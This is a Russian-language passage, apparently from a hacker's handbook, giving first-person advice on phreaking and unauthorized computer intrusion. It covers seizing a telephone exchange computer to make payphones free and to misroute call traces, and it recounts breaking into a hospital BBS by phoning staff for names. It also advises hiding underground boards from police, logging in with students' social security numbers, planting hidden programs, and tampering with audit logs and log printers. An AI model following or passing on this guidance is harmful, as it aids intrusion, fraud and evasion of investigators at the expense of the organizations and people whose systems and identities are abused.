В случае, если у вас водятся деньги, или вам удалось взломать какой-нибудь счет, вы можете заниматься хакерством в гостинице или мотеле. Денежные проблемы беспокоят хакеров и по другой причине. Телефонные счета растут, как на дрожжах, поэтому многие хакеры являются также и фрикерами. Фрикерэто человек, занимающийся взломами телефонных сетей. Одним из основных аспектов этого занятия является создание тональных кодов, которые заставляют телефонную систему выполнять специальные функции, такие, как бесплатные звонки на дальние расстояния. Фрикерство, разумеется, представляет собой обширную область для хакерских исследований, и с телефонными системами — а особенно с компьютерами, обслуживающими эти системы, — должен быть близко знаком каждый хакер. Многие хакеры считают, что любое другое хакерство, нежели взлом таких компьютеров, — это детские игры. В чем- то они правы.

Телефонные компьютерные сети — это невероятно большие, распространенные, замечательные массивы хитроумных функций, громадных баз данных, технических операций и прочих чудес, на фоне которых бледнеет все прочее хакерство. Покинув ваш дом, телефонный сигнал отправляется на местную АТС, которая управляет всеми телефонами вашего района. Каждая АТС управляется собственным компьютером. Такие компьютеры и являются потенциальными целями взломщиков телефонных компаний; если вы получите доступ к компьютеру, у вас будет доступ ко всем телефонам, которыми он управляет. Вы сможете включать и выключать телефоны, перенаправлять вызовы, изменять номера. Не будь вы хакером, вы могли бы устроить таким образом немалый переполох.

Существуют также коммутируемые сети, которые соединяют между собой компьютеры, управляющие коммутаторами. Из них можно проникнуть в региональные Системы типа COSMOS {одной из функций которой является создание и уничтожение телефонных номеров). Когда вы поближе Познакомитесь с особенностями этих телефонных компьютеров, вы можете использовать их для собственной зашиты. Например, вы не хотите делать хакерские телефонные звонки из собственного дома. Вы можете соединиться с компьютером вашей местной АТС, взять телефонные номера нескольких автоматов и сделать их бесплатными. Затем вы можете взламывать из этих автоматов хоть целый мир.

Вы можете также использовать региональную обслуживающую систему, чтобы временно изменить ваш настоящий номер телефона на номер, допустим, близлежащей церкви. В случае, если ваши звонки и отследят, слежка отправится по ложному пути. Должен заметить, что вызов удаленных компьютеров — не такая безопасная вещь, как может показаться. Иногда соединение с помощью телефона или компьютера дает ложное чувство защищенности, особенно, если вы уже достигли успехов в хакерстве и фрикерстве и утратили чувство бдительности, Не допускайте подобного. Всегда следуйте правилам безопасности. Не приобретайте никаких привычек. Делайте звонки всегда из разных мест и в разное время  дня.  

Когда лучше всего делать вызовы? Каждый хакер ответит на этот вопрос по-разному. Поздний вечер хорош тем что системные администраторы, скорее всего, уже дома — но то же самое можно сказать и про большинство полноправных пользователей, и вы со своим звонком будете выделяться, как клоун на похоронах. Можно попытаться также звонить в самый разгар рабочего времени, в середине утра и после обеда, но в это время мэйнфрэймы работают медленнее всего, вашу деятельность нетрудно будет заметить, да и бюджет, который вы взломали, может быть занят. Наилучшего времени для вызовов не существует -- вам могут помочь разве что исследования организации устройства компьютерной зашиты конкретного предприятия. Замечайте время, в течение которого вы были соединены с машиной по телефону. В случае, если это местный звонок, сигнал идет мгновенно, и чуть дольше — если вы звоните издалека. Но не стоит висеть по полдня на одной и той же линии. Лучше сделать несколько вызовов с разных телефонных номеров на разные номера доступа. В случае, если на избранном вами объекте имеется несколько коммутируемых линий, следует время от времени бессистемно пользоваться каждой из них.

Советы по лаптопам

В случае, если вы делаете вызов бог знает откуда со своего портативного лаптопа, я могу предложить вам несколько полезных советов. В случае, если вы находитесь в незнакомом месте, например, в офисе, отеле, аудитории после уроков, ваш лаптоп является неоспоримой ценностью — до тех пор, пока он работает. Никогда не подключайте ваш модем к незнакомому телефону. Сначала убедитесь, что не сожжете таким образом ваше оборудование. Многие конторы устанавливают свои собственные электронные телефонные системы, или РВХ (private branch exchange) — частные телефонные станции, для выполнения специальных функций, таких как переговоры внутри здания, либо чтобы не дать определенным телефонам делать телефонные звонки на дальние расстояния. По проводам некоторых РВХ течет ток, достаточный, чтобы повредить ваш хрупкий модем. Для того, чтобы проверить безопасность линии, сначала попробуйте подсоединить к ней обычный дешевый телефон. В случае, если он заработает, то и модем тоже будет работать. Телефоны, объединенные в РВХ, могут не работать с вашим модемом из-за специальных звуковых или цифровых кодов, используемых в локальных процедурах маршрутизации. В случае, если на вашем проверочном телефоне имеется сигнал в линии, но модем не работает, значит, данная РВХ неисправна. Для устранений этой проблемы вы можете включить модем в телефонную розетку, а комнатный телефон (не тот, что взяли для проверки!) — к модему (для этого вам может понадобиться специальный двойной порт). Для того, чтобы использовать модем, вы делаете звонок с комнатного телефона, а затем, услышав звонок удаленного компьютера, включите модем и подсоединяйтесь.

Вы можете приобрести устройства для обработки сигналов, проходящих между телефоном и модемом. Такое устройство приспосабливает обычные сигналы модема к цифровым системам вроде РВХ. Для вас это будет более приемлемым, особенно если вам часто приходится сталкиваться с РВХ. Иногда попадаются такие места, где есть телефон, но нет розетки для вашего модема. В этом случае надо отвинтить рупор микрофона телефона и с помощью кабеля с присоединенными «крокодильчиками» соединить красные и зеленые провода вашего модема с двумя серебристыми контактами микрофона телефонной трубки. Это может повлечь за собой возникновение слабого сигнала, поэтому, если в вашем распоряжении есть настоящий телефонный аппарат (а не одна трубка), снимите с него корпус и соедините красные, зеленые провода модема с красными, зелеными проводами телефонного преобразователя. Для того, чтобы позвонить, вам придется придерживать рычаг телефона.

Ваше походное снаряжение

Прежде чем выхолить на большую дорогу, не забудьте прихватить с собой следующие предметы: лаптоп, иди другой портативный компьютер. Обязательно модем. Лучше два: внутренний и внешний, с чашечками акустического соединителя. Один небольшой, дешевый, надежный телефонный аппарат для проверки напряжения на линии. Можно использовать готовый тестер, но телефон удобнее использовать, например, в мотелях, где акустический соединитель может не подойти к местному телефону. Телефонный шнур с модульным зажимом на одном конце и зажимами«крокодилами» на другом. Ножницы для обрезки проводов, отвертки и набор шнуров с портами разного размера.

Ходьба на «цыпочках»

Большинства менеджеров смотрят даже на самых честных, избегающих разрушений хакеров как на дьявольское отродье. Поэтому, если вас застали за взломом чужих компьютеров, ждите неприятностей. Даже если ваш взлом не принес никому вреда, вас все равно, скорее всего, накажут. Я читал статьи о том, что компьютерные преступления ежегодно уносят, по крайней мере, от 3 до 5 биллионов долларов. Другие же источники приводят данные до ста биллионов. Лично мне даже три биллиона кажутся несколько завышенной, для пущей убедительности, суммой. Но правительство и владельцы предприятий считают иначе. Они понимают, что большинство компьютерных преступлений остаются нераскрытыми, и реальные убытки могут оказаться гораздо больше официальной суммы. Даже если все эти биллионы долларов — не более, чем выдумки, государство и промышленники в них верят, и полны решимости наказывать вся- кого, кто отнимает у них такие деньги.

Давайте теперь рассмотрим случай, произошедший с BBS Гринвудской «Pretty Theft» («Вороватая милашка») — так звали одну женщину-хакера, с которой я время от времени общался. Однажды она послала мне на BBS сообщение, в котором спрашивала, не знаю ли я, как проникнуть в компьютеры одного госпиталя неподалеку от меня. Я был в недоумении — задача была проще простого, и взлом данной системы можно назвать одним из моих первых успехов. При загрузке в эту систему появлялось следующее сообщение (все имена и номера, разумеется, изменены):

Добро пожаловать в GFH-NET!   300-2400 бод (123)454-7890 GREENWOOD

FAMILY HOSPITAL GFH-NET обслуживается Роджером Корнуоллом и

Гарольдом Липником.   В случае,   если у вас возникнут вопросы или

комментарии,   напишите им по электронной почте!!!

Ваше имя?

Введите имя и фамилию:

Ваш пароль?

В случае,   если у вас нет пароля,   нажмите "RETURN" после ввода:

Через несколько месяцев после того, как я активно занялся хакерством, я сидел за компьютером и одновременно смотрел выпуск вечерних новостей. В новостях я увидел репортаж об одном из членов правительства, который сломал руку и был вертолетом отправлен в больницу. Тогда я подумал: «Эге, ведь в больницах наверняка есть компьютеры, верно? Так почему бы мне не взломать такой компьютер!» Итак, я раздобыл якобы закрытый номер доступа в сеть Гринвудской семейной больницы, и в ответ на вызов получил такой вот гостеприимный экран. Догадываетесь, что я сделал вслед за этим? Нетрудно догадаться — я, конечно же, ввел в качестве имени имя Роджера Корнуолла. К сожалению, у настоящего Роджера Корнуолла имелся какой-то пароль; а нажав «RETURN», я просто получил сообщение об ошибке. Тогда я попробовал имя Гарольд Липник. Тот же результат. Я достал телефонную книгу, нашел телефонный номер Гринвудской семейной больницы и позвонил. Женский голос сказал:

     Гринвуд. Чем я могу вам помочь?

     Извините, — сказал я, — нельзя ли пригласить Тома?

     Кого?

     М-м... Есть у вас один парень, я с ним уже говорил... Супервизор, или что-то в этом роде...

     Вы имеете в виду Аи Брауна? — спросила она. — Ну да, вот именно. (Не знаю, почему я решил, что его зовут Том.) А он на месте?

     Нет. Ли ушел в пять,

     Понятно, спасибо. Пока.

Я вернулся к своему компьютеру, снова вызвал GFH-NET и попробовал ввести в качестве имени «Ли Браун». Но мне опять не повезло. Впрочем, сделав еще несколько телефонных звонков по разным телефонам данной больницы, приведенным в книге, я вышел-таки на парня, не имевшего пароля. GFH-NET, как выяснилось, не представляла собой ничего особенного. Она не имела ничего общего с больничными счетами, записями о пациентах и т.п. Это была обычная медицинская BBS. Насколько мне удалось понять, данная система была создана для того, чтобы студенты-медики могли обсуждать различные проблемы с врачами. Никакой передачи файлов или чего-нибудь в этом роде; самая простая система сообщений. Она оказалась неинтересной, но зато было интересно в нее проникать. На следующий день я просматривал телефонные номера врачей на желтых страницах, и нашел восемь номеров врачей Гринвудской больницы. Из них трое не имели пароля. Таким образом, я был несколько озадачен тем, что у Вороватой Милашки возникли затруднения с этим взломом. Я вызвал BBS Гринвудской больницы, в первый раз за несколько лет, и, к своему удивлению, наткнулся на такой вот угрожающий экран:   

ДАННАЯ СИСТЕМА ПРЕДНАЗНАЧЕНА ТОЛЬКО ДЛЯ САНКЦИОНИРОВАННЫХ

ПОЛЬЗОВАТЕЛЕЙ! ЕСЛИ ВЫ НЕ ЯВЛЯЕТЕСЬ ТАКОВЫМ, ВАМ СЛЕДУЕТ

НЕЗАМЕДЛИТЕЛЬНО ОТКЛЮЧИТЬСЯ!

Всю полезную информацию как ветром сдуло! Осталась только это грозное предупреждение и бесполезное приглашение к вводу пароля. Я попытался войти под теми же именами, которыми пользовался когда-то, и обнаружил, что все они обзавелись паролями. Затем я попытался прибегнуть к социальной инженерии, но все те, с кем я разговаривал, словно воды в рот набрали. (Впоследствии мне удалось проникнуть в настоящую больничную систему с помощью нескольких милых секретарш из административного отдела.) Я отправил Вороватой Милашке ответное письмо по электронной почте, в котором спрашивал, что же там произошло. На следующий день я получил ответ: «В прошлом месяце мой друг лежал в больнице, и мне захотелось взглянуть, не удастся ли изменить его счет. Я помнила, что года два тому назад он давал мне этот номер, я посмотрела в блокнот и, к своему удивлению, обнаружила, что номер по-прежнему там. Я знала, как зовут лечащего врача моего приятеля, а навещая его в больнице, я узнала еще больше из справочной системы и объявлений на стенах. Затем я пыталась войти в систему, используя все эти имена, но в это время появимся системный оператор и вышвырнул меня. И каждый раз, когда я хотела продолжить свои попытки, происходило то же самое. Но на следующее утро, около восьми часов, мне наконец удалось проникнуть в систему. Один из врачей, имя которого я использовала, вводил вместо пароля собственное имя. Ты, наверно, догадываешься, что изменить счет моего друга мне не удалось, и больше вообще ничего не удалось... после того, как я ввела имя и пароль, система просто зависла. Вечером я попыталась еще раз, и вместо запроса имени на экране появилось следующее сообщение:

БОЛЬШАЯ ЧАСТЬ ВАЖНЫХ ФАЙЛОВ БЫЛА УНИЧТОЖЕНА КЕН-ТО ИЛИ ЧЕМ-ТО.

СИСТЕМА ВРЕМЕННО ПРЕКРАЩАЕТ СВОЮ РАБОТУ

Через неделю я попыталась проникнуть в систему еще раз, но безуспешно. Мне кажется, системный оператор решил, что я или кто-то еще уничтожил файлы, хотя на самом деле я этого не делала. Несколько дней назад я позвонила еще раз, просто так, и увидела — ну, ты знаешь, что. Как видно, они поумнели!»

Да, Милашка была права. Они действительно поумнели и усилили свою защиту. Вот почему хакерам не следует открыто подходить к системе или привлекать внимание каким-либо другим способом. На самом деле существует только один случай, когда следует обнаруживать себя системному оператору, и только тогда, когда вы уже изучили всю систему и больше никогда не собираетесь в нее возвращаться. Кое в чем Роджер и Гарольд действительно поумнели, а кое в чем нет. Я проявил некоторое упорство и снова взломал GFH-NET. Как выяснилось, я и сам малость поумнел: медицинские беседы между докторами и студентами показались мне гораздо более понятными, чем каких-то два года назад. А может, это студенты поглупели? Я увидел также старое объявление одного из системных операторов. Он рассказывал то, что ему было известно о случившемся инциденте с системой (а известно ему было немного.) Речь в основном шла о том, что определенные файлы были уничтожены, а многие объявления заменены натуралистическими описаниями особенностей женской анатомии. Автор, похоже, считал, что файлы могли быть стерты или каким-то недоумком-оператором, либо хакером-злоумышленником. После некоторых исследований я обнаружил, что, хотя Данная опция и не присутствует в меню, нажатие клавиши «F» отправляет прямо в несуществующую систему передачи файлов. Подумав несколько минут, я ясно увидел, каким образом можно было подгрузить программу уничтожения любых файлов корневой директории после перезагрузки системы. На следующий день я послал системным операторам больницы длинное письмо, в котором подробно объяснял, каким образом можно устранить данную проблему, и как ликвидировать другие прорехи в защите. Подписался я так: «Искренне ваша, Полай Ваниа Хакер». Затем я снова вызвал BBS и загрузил им свое послание. Вскоре после этого я получил сообщение от Милашки: «В больнице появился новый экран загрузки. Там написано: «СПАСИБО, ПОЛАЙ! — P.К. и Г.Л.» Я был совершенно счастлив.

Уроки, полученные в больнице

Вы уже знаете, что системные операторы не жаждут приветствовать вас в своей системе. Поэтому-то вы и совершаете взлом. Но если вы обнаружите свое присутствие, у вас, естественно, возникнут осложнения.

Системные операторы GFH-NET чуть с ума не посходили, когда поняли, что их компьютеры взломаны, и сделали так, что проникнуть в систему стало намного труднее. В случаях с такими маленькими BBS не имеет большого значения, проникнете вы в них, или нет, но если вы имеете дело с чем-то вроде правительственной организации, дополнительные сложности вам вовсе ни к чему.

В случае, если вы каким-то образом обнаруживаете свое присутствие — например, вводя в качестве пароля подряд все слова из словаря, и каждый раз получая сообщение «НЕПРАВИЛЬНО ВВЕДЕНЫ ВХОДНЫЕ ДАННЫЕ», — системные операторы, как минимум, обеспокоятся. Это означает, что вам уже не удастся получить никакой информации по телефону, а также возможно изменение паролей всех легальных пользователей либо чистка неиспользуемых бюджетов, которая, впрочем, может облегчить вход. С другой стороны, если вы испытываете теплые чувства по отношению к той или иной системе, и не хотите, чтобы ей был причинен вред (и вас мало беспокоит то, что вы можете в нее никогда больше не вернуться), вы можете принять решение известить операторов обо всех маленьких недостатках, которые вы обнаружили в их замечательной системе. Во многих случаях вам просто не поверят. Они могут даже не потрудиться проверить ваши сообщения, либо потому, что уверены в собственной непогрешимости, либо потому, что примут вашу информацию за какую-то уловку, да бог знает, почему еще. Но если они действительно поверят вам и примут ваши советы, они будут весьма благодарны и, если вы попросите, наградят вас доступом невысокого уровня или сообщат какие-нибудь интересные сведения. Скажите им, что вы будете их неофициальным «советником по безопасности». Некоторые из них с радостью примут ваше предложение, хотя остальные предпочтут больше не иметь с вами дела.

Защита BBS

Этот раздел посвящен двум предметам безопасного использования BBS хакерами: хакер-пользователь и хакер — системный оператор. Эти две ипостаси тесно взаимосвязаны, поскольку системные операторы одной BBS могут в то же время являться пользователями других. Вы должны применять эти меры предосторожности на всех BBS, которые вы используете и запускаете, и не стоит связываться с системами, которые не обеспечивают высокой степени хакерской безопасности.

Не помещайте сообщений, содержащих сведения о нелегальной деятельности на BBS, в безопасности которых вы не уверены полностью. Не следует также расписывать свои хакерские достижения в своей личной электронной переписке. В случае, если вы всерьез увлечены электронными системами объявлений, постарайтесь всеми силами подружиться с «неблагонадежными» системами, если не хотите портить себе перспективу вашего дальнейшего существования в компьютерном мире. Но всегда следует убедиться, что ваши сообщения на этих досках никак не втянут вас ни во что криминальное. Поймите меня правильно. Я вовсе не утверждаю, что размещение хакерских сообщений на хакерских BBS гарантирует вам безопасность — это совсем не так. В случае, если вы начали делиться информацией с другими хакерами на хакерской BBS, вам лучше убедиться, что системный оператор соблюдает следующие меры предосторожности: ложный фасад, спрятанные полдоски, полная двойная анонимность, шифровка и проверка намерений.

 Самым главным аспектом любой хакерской группы, клуба или BBS является секретность. Настоящая хакерская BBS не станет давать рекламу, поскольку не нуждается в новых членах. Хакерская BBS снаружи может казаться очень домашней, этакой семейной BBS, но стоит набрать кодовое слово, не указанное в меню, ввести один-два пароля — и вот вы вошли, в секретную область. Хакерская BBS должна также заботиться о своей безопасности, разрешая вход в секретные разделы только определенным пользователям, чтобы не дать несанкционированным хакерам пользователям или псевдо хакерам взломать ваше место сбора. Любая хакерская BBS, пренебрегающая этими простыми правилам, необходимыми, чтобы казаться легальной, является несерьезной, опасной, и с ней не следует иметь дела. Многие BBS делают еще большие с глупости — я встречал такие системы, для получения доступа в секретные разделы которых достаточно было набрать в качестве пароля слова вроде «DEATH» («СМЕРТЬ») или даже «PASSWORD» («ПАРОЛЬ»). Нечего и говорить, что информация, которую можно найти на таких досках, не обладает высокой ценностью, и обычно состоит из взаимной перебранки между пользователями. Ни один новый пользователь не должен быть допущен на хакерскую BBS до тех пор, пока один или несколько действительных пользователей не смогут подтвердить, что он не из полиции, что он будет соблюдать принятые в данном сообществе нормы поведения, располагает полезной информацией и умеет держать язык за зубами.

В качестве системного оператора вы можете получить удовольствие, составляя список правил, определяющих процедуру приема на BBS новых членов. Помните о том, что, пока новый человек не будет принят на BBS, он не должен даже знать о ее существовании. Это позволит вам избежать встречи с полицейскими и сделать секреты системы доступными только для самых лучших хакеров. Как только новый человек будет принят, частная информация о нем должна быть стерта из памяти компьютера.

Вообще, поразмыслите о тех BBS, членом которых вы являетесь на данный момент. Нет ли среди них таких, которые могут накрыть во время полицейской облавы? Лаже если ни вы сами, ни остальные члены системы не совершают никаких нелегальных действий в данной системе, федеральным агентам на это наплевать. В случае, если вы не хотите оказаться замешанным в деле о компьютерном преступлений, даже незначительном, попросите оператора подпольной BBS, членом которой вы являетесь, заменить вашу личную информацию — имя, адрес, телефон, — на ложную. В случае, если вы решили распрощаться с какой-либо BBS. обязательно информируйте оператора о том, что вы хотите, чтобы ваша информация была уничтожена. (Одна из вполне законных — с точки зрения хакера, конечно, — причин для взлома BBS — именно желание убедиться, что такая информация была изменена или уничтожена.) Обязательно проделывайте все эти вещи, поскольку блюстители порядка обожают заставать хакеров врасплох. В случае, если представитель закона не сомневается в том, что конкретный хакер пользовался конкретной хакерской BBS, он может и сам совершить взлом, чтобы добраться до настоящего имени этого хакера. Так или иначе, убедитесь в том, что ваши настоящие данные никогда не всплывут в мутной водице.

Прежде чем мы продолжим разговор о том, что следует делать, будучи системным оператором хакерской BBS, я хотел бы привести наглядный пример того, что случается с хакерами, которые НЕ следуют приведенным выше советам. В 1986 году в Детройте появилась BBS с простым, но высокопарным названием — «The Board» (игра слов — доска или министерство, совета т.п.). Доска использовала компьютер НР2000, и влекла к себе хакеров и кракеров (а также тех, кто только хотел стать таковыми) отовсюду, 20-го августа при загрузке в систему на экране появлялось следующее сообщение:

Добро пожаловать на "осиную" BBS команды (1-ТЕАМ) МАЙКА ВЕНАЛАНА!

(Компьютерное обеспечение - BOARDSCAN) 66 мегабайт 300,   1200 бод -

24 часа.  У нас есть (3) линии - и ни одной занятой.  313-ХХХ-ХХХХ

В случае, если в тот день вы вызывали систему и читали новые сообщения, вас могло удивить такое сообщение:

Доска объявлений:

Общая информация и BBS

Сообщение:  41 Заголовок:  ВАС НАДУЛИ!!!

Кому:  ВСЕМ

От кого: ГЛАВНЫЙ ТЕХНИК Отправлено: 8,20,86 @ 12.08 часов

Приветствуем:

Вы находитесь на THE BOARD, "осиной" BBS, оператор МАЙК ВЕНАЛАНА

из команды WDIV-TV.

Цель: продемонстрировать и задокументировать существование криминальной и

потенциально противозаконной деятельности хакеров и телефонных

мошенников, или так называемого "хакерского сообщества".

Благодарим вас за сотрудничество. В течение последних полутора

месяцев мы получили от вас информацию всех видов, которая

обнаруживает ваше участие в подделке кредитных карточек,

телефонных счетов, вандализме и, возможно, в насильственном

проникновении в государственные компьютеры либо компьютеры

общественной безопасности. Самое главное, теперь у нас есть ваши

объявления, ваши электронные адреса, и - что важнее всего - ваши

НАСТОЯЩИЕ имена и адреса. Что мы собираемся со всем этим делать?

Не уходите с канала News 4. Я планирую специальные серии докладов

о наших экспериментах "с THE BOARD, которую посещали пользователи

от побережья до побережья, а также пользователи Канады в возрасте

от 12 до 48 лет. Наши постоянные пользователи знали меня как

ГЛАВНОГО ТЕХНИКА, не считая других ID. Джон Максфилд из Boardscan

являлся нашим консультантом и обеспечил нам НР2000, который

поддерживал это "осиное гнездо". С помощью ретрансляции звонков и

других современных средств, которые стали возможными благодаря

телефонной технологии, данная BBS взаимодействовала с удаленными

пользователями, находясь непосредственно здесь, в Детройте. Когда

будут готовы наши доклады? Через несколько недель мы собираемся -

непосредственно вступить в контакт с многими из вас, подключив

полицию и агентов по безопасности из компаний по производству

кредитных карточек и из телефонных служб. Докладов будет чертовски

много. Спасибо за помощь. И не затрудняйте себя излишним

беспокойством. Помните - у нас есть ВАШИ настоящие имена.

Майк Вендланд, WDIV, Detroit, Ml.

Доска объявлений:

Основная информация и BBS

Сообщение: 42

Заголовок: BOARDSCAN

Кому: ВСЕМ

От кого: КОСИЛЬШИК Отправлено: 8,20,86 в 3.31 часа

Это Джон Максфилд из Boardscan  (1).   Приветствую!   Просьба

отправлять все бомбы Майку Вендланду из WDIV,   Detroit.  Эта доска -

его идея.   КОСИЛЬШИК (он же Cable Pair)

Нужны ли здесь какие-либо комментарии? Теперь вы видите, что люди, которые охотятся за хакерами — то есть, за ВАМИ, — отнюдь не просто тупые копы. Максфилд знал достаточно, чтобы придумать прозвища «k001», типа Косилыцика (The Reaper) и Cable Pair.

Пароль для новых пользователей, желающих попасть в систему, был HEL-N555,Elite,3 — неплохой пароль, если принять во внимание его происхождение. Максфилды разбираются в хакерстве не хуже, чем мы с вами. Они знают нашу культуру, жаргон и способ мышления. Последнее причиняет особенно много неприятностей, а значит, вам следует обладать своим собственным стилем мышления. Вы не станете хакером высшего класса, пока не научитесь полностью использовать свой здравый смысл. Помните об этом, вызывая BBS. У нас есть право запускать свои собственные BBS и обмениваться информацией с их помощью. Но информацию с хакерской доски вы вряд ли стали бы показывать своей матушке.

Заявления типа «На данной BBS запрошены любые противозаконные дискуссии...» бесполезны, но они могут послужить дополнением к следующему утверждению: многие традиционные законы против хакерства говорят о «намеренном причинении вреда». Можно ли доказать, что хакер или кракер умышленно повредил компьютер? В случае, если вы основали хакерскую BBS или клуб, вы должны убедиться в честности намерений ее участников. Пусть они подпишут соглашение о том, что они никогда не нанесут умышленного вреда чужому компьютеру или его содержимому, что обмен информацией, которая появляется на BBS, имеет под собой исключительно познавательную цель, что никакие обсуждения нелегальной деятельности не станут преследоваться и т. д. Таким образом члены BBS будут следовать вашему своду правил «хакерского кодекса чести», который может появляться на экране во время прохождения процедуры загрузки. Такое соглашение, возможно, и не убережет вас от столкновения с законом, но позволит вам достичь двух целей: нарушившие соглашение члены BBS будут исключаться; а судьи, благодаря ему, возможно, поверят, что ваша BBS — всего-навсего невинный кружок для людей, которых объединяет общее хобби. Системным операторам стоит заставить участников своей BBS подписать такое соглашение еще и затем, чтобы в случае рейда блюстителей закона пользователи могли на законном основании потребовать вернуть им деньги за разрушенное оборудование, потерянное время, ложные аресты, причиненное беспокойство.

Электронную почту следует всегда держать под рукой, чтобы можно было истолковать в свою пользу «Акт о неприкосновенности электронных коммуникаций». Данный акт предусматривает арест каждого служителя закона, который прочтет электронную почту, являющуюся частной в течение 180 Дней. Подобное же, впрочем, ждет каждого пользователя, хранящего свою почту на вашей BBS. Итак, если ваши веселые хакеры подпишут такое соглашение и у каждого пользователя будет храниться образец электронной почты (которая может обновляться каждые 180 дней), вам следует продемонстрировать все это вторгшимся на вашу территорию полицейским. Можно сделать для них специальное сообщение о том, что, в соответствии с законом, некоторые хранящиеся в данной системе материалы и электронная почта, а также сама система и компьютер, на котором она расположена, по закону являются неприкосновенной частной собственностью. Как системный оператор, можете попросить их довести до вашего сведения любую информацию о незаконной деятельности в рамках системы, если таковая будет обнаружена, поскольку вы «не потерпите подобного на своей BBS».

Джон Максфилд, консультант по компьютерной безопасности, просматривает BBS в поисках свидетельств хакерской деятельности, а обнаружив их, информирует об этом компанию, подвергшуюся взлому. Вы сами знаете, как хрупка бывает компьютерная безопасность. Размещая сообщения или посылая электронную почту на BBS, вы словно открываете ее всему миру. Не позволяйте таким вот охотникам на хакеров копаться в ваших личных делах.

Другие меры по обеспечению безопасности в режиме  онлайн

В случае, если вы станете следовать какой-либо определенной схеме, вам станет проще жить, но зато другим будет легче найти то, что вы хотели бы спрятать, и заметить вас, когда вы предпочли бы остаться незамеченным. Один работник нефтяной компании попросил системного менеджера каждый раз до начала компьютерного сеанса устанавливать для него временные резервные записи, чтобы он мог прочесть их перед тем, как приступить к работе. Менеджер сразу заподозрил, что этот человек ищет резервные данные, которые сохраняли до него на этих лентах другие сотрудники. Этого промышленного шпиона, как и многих других, поймали из-за того, что он действовал в рамках определенных установок. Преступники, в том числе и хакеры, любят создавать планы своих действий. Но любой придуманный вам план должен содержать в себе элементы случайности. Не позволяйте себе всегда делать вызовы удаленного компьютера в одной то же время, использовать одни и те же рабочие станции или телефоны, поскольку в один прекрасный день, придя на излюбленное вами место, вы можете обнаружить, что некто поджидает вас там с парой наручников.

Однажды мне в руки попал список номеров социальной безопасности: это был первый урок в компьютерном классе, и профессор попросил студентам сделать для него список с их именами и номерами, чтобы затем создать их компьютерные бюджеты. Я подождал, пока бюджеты будут созданы, но не стал перебирать все подряд. Вместо этого я вводил новое имя через каждые несколько часов чтобы создать впечатление, что это разные люди входят в систему под своими именами. После первой загрузки система попросила меня сменить мой пароль. После этого мне удалось использовать команду изменения паролей операционной системы, чтобы настоящий пользователь смог войти в нее, введя свой номер социальной безопасности. Но в каждой из пользовательских директорий я оставил спрятанную программу, дабы позднее использовать ее для удаленного просмотра файлов и игр. В случае, если вы попадете в ситуацию, когда будете не в состоянии сменить измененный вами пароль обратно на пароль легального пользователя, попытайтесь снова ввести пароль, подобный номеру социальной безопасности — например, 123-45-6780 вместо 123-45-6789, словно вводивший пароль ошибся клавишей. Переходя от одного взломанного бюджета к следующему, важно изменить также свой образ действия. Как вам известно, оказавшись в системе, следует постараться создать новый бюджет для себя. Но всегда используйте разное имя и па- роль, причем вводимые данные должны иметь как можно меньше отношения к реальным данным о вашей персоне.

Журналы регистрации (Log-файлы)

Вам не составит труда заставить производителей продукции по компьютерной защите послать вам по электронной почте всю информацию об их товарах. Для меня имеет значение, в основном, такое программное обеспечение, которое незаметно следит за тем, что происходит в системе, проверяет ресурсы системы на предмет неправильного и беспорядочного использования и ведет журнал регистрации на диске или в распечатках. Сотрудник компании может заглянуть в журнал и сказать себе: «Ого! М-р Полтри каждый раз входит в систему в три часа ночи. Странно... Надо бы поговорить с ним...» Внезапно вы оказываетесь в опасной ситуации, даже не зная об этом. Производя исследования конкретного компьютера, который вы собираетесь взломать, вы узнаете, какие из программ компьютерной защиты используются в данном случае (можно узнать об этом у системных операторов, прикинувшись консультантом по компьютерам, или зайти в библиотеку компании и заглянуть в справочник). Закажите у производителя программ по защите образцы его продукции, чтобы «знать своего врага в лицо». Журналы регистрации могут предупреждать администраторов обо всех ваших привычках. Даже если вы не собираетесь обзаводиться привычками, вы, возможно, станете причиной каких-либо проблем, что также будет отражено в журнале регистрации. В случае, если вы не собираетесь немедленно покидать взломанный компьютер, а, например, хотите выходить из него в сеть, вы должны обнаружить следящую программу компьютерной зашиты и обезвредить ее. Не стоит разрушать такую программу, просто перепрограммируйте ее так, чтобы она оставляла без внимания ваш вход в систему. Или выясните, каким образом она ведет запись происходящего и посмотрите нельзя ли уничтожить записи вашей деятельности. В случае, если вы сможете это сделать — прекрасно, значит, вам, скорее всего, достался корневой доступ. В случае, если вы в течение некоторого времени загружались одним и тем же образом, вам надо изменить соответствующие записи, чтобы создать впечатление случайности при прохождении входных процедур. Возможно, вам также удастся использовать команду установки времени или даты, чтобы в свою очередь следить за следящей программой.

Внимание!

Очень многие хакеры, пытаясь осторожно отредактировать записи следящей программы со своими действиями, обнаруживали к своему ужасу, что уничтожили больше, чем требовалось. Другие пытались оказать помощь, очищая грязную программу, что приводило к различным несчастьям. Всегда создавайте резервные копии, особенно на компьютерах, которые принадлежат не вам. В случае, если вам необходимо изменить чужой файл, изменяйте его копию. Затем убедитесь, что сделали все правильно, и только после этого уничтожайте оригинал и переименовывайте копию.

Одни из простейших задач, которую выполняют большинство следящих программ и многие средства зашиты ОС — запись неудачных попыток входа в систему. Для того, чтобы узнать, каким образом избранный вами компьютер реагирует на неправильные входные данные, вам опять же понадобятся исследования. Некоторые программы позволяют сделать три-четыре попытки ввода комбинации имя, пароль, после чего перезагружаются, сохраняя последнюю попытку. В этом случае вместо ввода последнего пароля лучше нажать Control-C или что-то другое, позволяющее вернуться к предыдущему уровню взаимодействия.

Следящие программы могут стать досадной помехой при такой большой работе, как атака с помощью грубой силы. В случае, если получится, попробуйте написать программу для перебора паролей так, чтобы обмануть журнал регистрации. Можно обратиться прямо к аппаратному обеспечению, или, в зависимости от того, какие вещи записывает журнал, переименовать могущие показаться подозрительными команды.

Распечатанные журналы являются большой проблемой. Можно попытаться изменить записи на ленте или диске, но что если программа защиты одновременно делает распечатку происходящего? Тут-то ничего уже не исправишь. Не допускайте ошибок. Ограничьте подозрительную деятельность до тех пор, пока не сможете вывести из строя принтер. Возможно, вам удастся запрограммировать принтер на печать несуществующим шрифтом, или если принтер цветной, на печать таким цветом, которого нет на ленте или картридже. Конечно, если вы действуете по телефонной линии, вам неизвестно, какое оборудование используется. Впрочем, существует еще возможность заставить компьютер выводить данные на другой, несуществующий принтер. Иногда удается даже заставить компьютер думать, что он выводит данные на принтер, в то время как они идут через его модем — в таком случае, вы будете получать репортажи о своей собственной деятельности.

